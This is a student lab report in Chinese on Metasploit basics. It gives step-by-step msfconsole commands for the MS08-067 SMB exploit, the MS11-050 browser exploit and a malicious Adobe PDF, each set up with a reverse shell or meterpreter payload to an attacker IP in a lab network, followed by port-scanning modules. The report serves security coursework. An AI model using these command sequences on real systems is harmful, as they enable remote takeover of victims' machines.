zoukankan      html  css  js  c++  java
  • 2017-2018-2 20155204《网络对抗技术》EXP5 MSF基础应用

    一、基础问题回答

    用自己的话解释什么是exploit,payload,encode

    • exploit:利用靶机系统中的一些漏洞进行攻击的过程,除去前期准备的工作,这一步是实施攻击。
    • payload:载荷,将病毒代码打包成程序等形式,配合我们准备好的漏洞传输。
    • encode:对payload进行加密伪装,为他打掩护。

    二、实践过程

    1.Windows服务渗透攻击——MS08-067安全漏洞

    在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    msf > use exploit/windows/smb/ms08_067_netapi

    msf exploit(ms08_067_netapi) > show payloads

    msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连

    msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(ms08_067_netapi) > set LPORT 5213 //攻击端口

    msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161 //靶机ip,特定漏洞端口已经固定

    msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高

    msf exploit(ms08_067_netapi) > exploit //攻击

    2.浏览器渗透攻击——MS11-050

    在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    msf > use windows/browser/ms11_050_mshtml_cobjectelement

    msf exploit(ms11_050_cobjectelement) > set payload
    windows/meterpreter/reverse_http //http反向回连

    msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(ms11_050_cobjectelement) > set LPORT 5213 //攻击端口固定

    msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm //统一资源标识符路径设置

    msf exploit(ms11_050_cobjectelement) > exploit

    • 问题:这里记录下问题,这个靶机那边ie6浏览器访问网站时一直报404,网络是连接好的,跟kali可以ping通,版本也没有问题,访问之后kali这边就会提示如上图,不知道为什么,这个问题也一直没有解决。。。(甚至直接拷贝了成功同学的xp虚拟机过来也不对)。

    3.针对Adobe Reader软件的渗透攻击——adobe_toolbutton

    在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    msf > use windows/fileformat/adobe_cooltype_sing

    msf exploit(adobe_cooltype_sing) > set payload
    windows/meterpreter/reverse_tcp //tcp反向回连

    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(adobe_cooltype_sing) > set LPORT 5213 //攻击端口

    msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf //设置生成pdf文件的名字

    msf exploit(adobe_cooltype_sing) > exploit //攻击

    在kali上输入back退出当前模块,进入监听模块,输入以下命令:

    msf > use exploit/multi/handler //进入监听模块

    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接

    msf exploit(handler) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(handler) > set LPORT 5213 //攻击端口固定

    msf exploit(handler) > exploit

    4.应用任何一个辅助模块。

    • 使用scanner/http/prev_dir_same_name_file模块
      该模块识别第一个父目录中与给定目录路径具有相同名称的文件。 示例:PATH为Test / backup / files /将查找Test路径下文件/backup/files.ext,.ext为设定的文件类型。

    • 使用auxiliary/scanner/portscan/syn模块

    该模块使用发送TCP SYN标志的方式探测开放的端口。下面是我扫描到了我的靶机、

    三、离实战还缺些什么技术或步骤?

    如何将后门文件安全传输或者了解靶机漏洞情况,这个是我认为距离实战有差距的地方。

    四、实验总结

    这次的实验让我感觉又距离实际操作进了一步,应用到了许多常见的漏洞。但是我们还是比较局限于msf的一些模块,而且把生成的文件图标啊弄到靶机上也比较难,所以期待下一次的实验能有新的突破。

  • 相关阅读:
    PAT B1021 个位数统计 (15)
    PAT B1006 换个格式输出整数 (15)
    PAT A1058 A+B in Hogwarts (20)
    PAT A1027 Colors in Mars (20)
    PAT A1019 General Palindromic Number (20 分)
    PAT B1022 D进制的A+B
    J2EE
    MVC
    数据库长连接短连接
    twisted
  • 原文地址:https://www.cnblogs.com/20155204wh/p/8978203.html
Copyright © 2011-2022 走看看